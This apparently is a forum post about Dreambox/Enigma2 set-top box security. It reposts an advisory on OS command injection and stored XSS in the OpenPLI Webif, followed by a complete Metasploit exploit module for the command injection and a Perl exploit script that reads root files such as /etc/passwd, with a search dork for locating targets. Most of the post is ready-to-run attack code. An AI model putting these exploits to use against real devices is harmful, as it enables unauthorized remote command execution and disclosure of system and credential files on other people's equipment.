Pareri .... ? Dreambox Security / Bugs .... ??? Discutii .... ????
###############################Device Name: OpenPLI - Dream Multimedia Box with OpenPLI softwareVendor of device: Dream MultimediaVendor of Software: OpenPLI Community============ Device Details: ============ Linux Kernel Linux version 2.6.9 (build@plibouwserver) (gcc version 3.4.4) #1 Wed Aug 17 23:54:07 CEST 2011Firmware release 1.1.0, 27.01.2013FP Firmware 1.06Web Interface 6.0.4-Expert - PLi edition by [lite]More infos: [Only registered and activated users can see links. Click Here To Register...]============ Vulnerability Overview: ============ * OS Command Execution: parameter: maxmtuThe vulnerability is caused by missing input validation in the maxmtu parameter and can be exploited to inject and execute arbitrary shell commands. It is possible to use [Only registered and activated users can see links. Click Here To Register...] to fully compromise the device.[Only registered and activated users can see links. Click Here To Register...]It is possible to shorten the URL to the following:[Only registered and activated users can see links. Click Here To Register...]There is [Only registered and activated users can see links. Click Here To Register...] preinstalled on the device. It is a very small edition of [Only registered and activated users can see links. Click Here To Register...], so you have to play a bit with it but you will get it ;)* stored XSS:Box Control -> Configuration -> Webserver -> User, Password parameter: AuthUser, AuthPasswordBox Control -> Configuration -> Settings parameter: audiochannelspriorityInjecting scripts into the parameter audiochannelspriority reveals that this parameter is not properly validated for malicious input.============ Solution ============No known solution available.============ Credits ============The vulnerability was discovered by Michael MessnerMail: devnull#at#s3cur1ty#dot#deWeb: [Only registered and activated users can see links. Click Here To Register...]Twitter: @s3cur1ty_de#####################
### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# web site for more information on licensing and terms of use.# [Only registered and activated users can see links. Click Here To Register...]##require 'msf/core'class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'OpenPLI Webif Arbitrary Command Execution', 'Description' => %q{ Some Dream Boxes with OpenPLI v3 beta Images are vulnerable to OS command injection in the Webif 6.0.4 Web Interface. This is a blind injection, which means that you will not see any output of your command. A ping command can be used for testing the vulnerability. This module has been tested in a box with the next features: Linux Kernel version 2.6.9 (build@plibouwserver) (gcc version 3.4.4) #1 Wed Aug 17 23:54:07 CEST 2011, Firmware release 1.1.0 (27.01.2013), FP Firmware 1.06 and Web Interface 6.0.4-Expert (PLi edition). }, 'Author' => [ 'm-1-k-3' ], 'License' => MSF_LICENSE, 'References' => [ [ 'OSVDB', '90230' ], [ 'BID', '57943' ], [ 'EDB', '24498' ], [ 'URL', '[Only registered and activated users can see links. Click Here To Register...]' ], [ 'URL', '[Only registered and activated users can see links. Click Here To Register...]' ] ], 'Platform' => ['unix', 'linux'], 'Arch' => ARCH_CMD, 'Privileged' => true, 'Payload' => { 'Space' => 1024, 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => '[Only registered and activated users can see links. Click Here To Register...] generic' } }, 'Targets' => [ [ 'Automatic Target', { }] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Feb 08 2013' )) end def exploit print_status("#{rhost}:#{rport} - Sending remote command...") vprint_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state") begin send_request_cgi( { 'uri' => normalize_uri("cgi-bin", "setConfigSettings"), 'method' => 'GET', 'vars_get' => { "maxmtu" => "1500&#{payload.encoded}&" } }) rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT fail_with(Msf::Exploit::Failure::Unreachable, "#{rhost}:#{rport} - HTTP Connection Failed, Aborting") end endend
#!/usr/bin/perl## Enigma2 Webinterface 1.7.x 1.6.x 1.5.x remote root file disclosure exploit### Author: Todor Donev# Email me: todor.donev@@gmail.com# Platform: Linux# Type: remote### Gewgle Dork: "Enigma2 movielist" filetype:rss#### Enigma2 is a framebuffer-based zapping application (GUI) for linux.# It's targeted to real set-top-boxes, but would also work on regular PCs.# Enigma2 is based on the Python programming language with a backend# written in C++. It uses the [LinuxTV DVB API], which is part of a standard linux kernel.## Enigma2 can also be controlled via an Enigma2:WebInterface.### Thanks to Tsvetelina Emirska !!##use LWP::Simple;$t = $ARGV[0];if(! $t) {usg();}$d = $ARGV[1];if(! $d) {$d = "/etc/passwd";}my $r = get("[Only registered and activated users can see links. Click Here To Register...]") or exit;print "[+] Enigma2 Webinterface 1.7.x 1.6.x 1.5.x remote exploit\n";print "[+] Target: $t\n";if ($r =~ m/<e2webifversion>(.*)<\/e2webifversion>/g){print "[+] Image Version: $1\n";}if ($r =~ (m/1.6.0|1.6.1|1.6.2|1.6.3|1.6.4|1.6.5|1.6.6|1.6.7|1.6.8|1.6rc3|1.7.0/i)){print "[+] Exploiting Enigma2 via type1 (file?file=$d)\n";result(exploit1());}if ($r =~ (m/1.5rc1|1.5beta4/i)){print "[+] Exploiting Enigma2 via type2 (file/?file=../../../..$d)\n";result(exploit2());}sub usg{print "\n[+] Enigma2 Webinterface 1.7.x 1.6.x 1.5.x remote exploit\n";print "[+] Usage: perl enigma2.pl <victim> </path/file>\n";exit;}sub exploit1{my $x = get("[Only registered and activated users can see links. Click Here To Register...]");}sub exploit2{my $x = get("[Only registered and activated users can see links. Click Here To Register...]");}sub result{my $x= shift;while(defined $x){print "$x\n";print "[+] I got it 4 cheap.. =)\n";exit;}}
